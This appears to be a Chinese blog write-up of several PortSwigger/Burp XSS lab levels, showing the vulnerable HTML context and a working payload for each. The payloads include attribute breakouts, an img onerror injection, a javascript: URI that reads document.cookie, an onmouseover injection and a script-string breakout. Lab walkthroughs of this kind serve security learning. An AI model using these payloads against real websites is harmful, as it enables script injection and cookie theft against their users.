首先在搜索框中输入xx,f12查看元素,找到相关xx出现的地方进行分析,发现其出现在一个img标签内 第四关:
美文网首页
XSS-burp靶场

XSS-burp靶场

作者: _Irving | 来源:发表于2024-04-11 16:05 被阅读0次

    第三关 "><svg onload=alert(1)>

    • 首先在搜索框中输入xx,f12查看元素,找到相关xx出现的地方进行分析,发现其出现在一个img标签内
    <img src="/resources/images/tracker.gif?searchTerms=xx">
    我们先进行闭合:
    "><svg onload=alert(1)>
    

    第四关:<img src=1 onerror=alert(1)>

    首先也是在搜索框录入aaaa,f12查看出现位置如下:
    <span id="searchMessage">aaaaaaa</span>
    搜索框录入:<img src=1 onerror=alert(1)>
    该src属性的值无效并引发错误。这会触发onerror事件处理程序,然后调用该alert()函数。因此,每当用户的浏览器尝试加载包含恶意帖子的页面时,就会执行有效负载。
    搜索后,f12查看如下:
    <span id="searchMessage"><img src="1" onerror="alert(123)"></span>
    

    第五关:javascript:alert(document.cookie)

    image.png
    在提交反馈页面上,将查询参数更改returnPath为/后跟随机字母数字字符串。
    右键单击并检查该元素,并观察您的随机字符串已放置在 ahref属性内。
    改成returnPath:
    javascript:alert(document.cookie)
    按 Enter 键并单击“返回”。
    
    <div class="is-linkback">
          <a id="backLink" href="javascript:alert(document.cookie)">Back</a>
    </div>
    点击页面的back触发
    

    第七关:"onmouseover="alert(1)

    第七关会对><进行html编码,我们录入aaa查看,其出现在input标签的带引号的属性值中,于是创造一个onmouseover属性,鼠标移动到其上调用属性值
    前面的引号是为了闭合前面的属性值
    "onmouseover="alert(1)
    

    第九关:';alert(1);//

    录入aaaa查询其出现的位置,我们看到如下的位置:
    <script>
          var searchTerms = 'aaaa';
          document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
    </script>
    所以我们录入';alert(1);//
    查询后f12结果就变成这样:
    <script>
           var searchTerms = '';
           alert(1);//';
          document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">')
    </script>

    相关文章

      网友评论

          本文标题:XSS-burp靶场

          本文链接:https://www.haomeiwen.com/subject/fbbqxjtx.html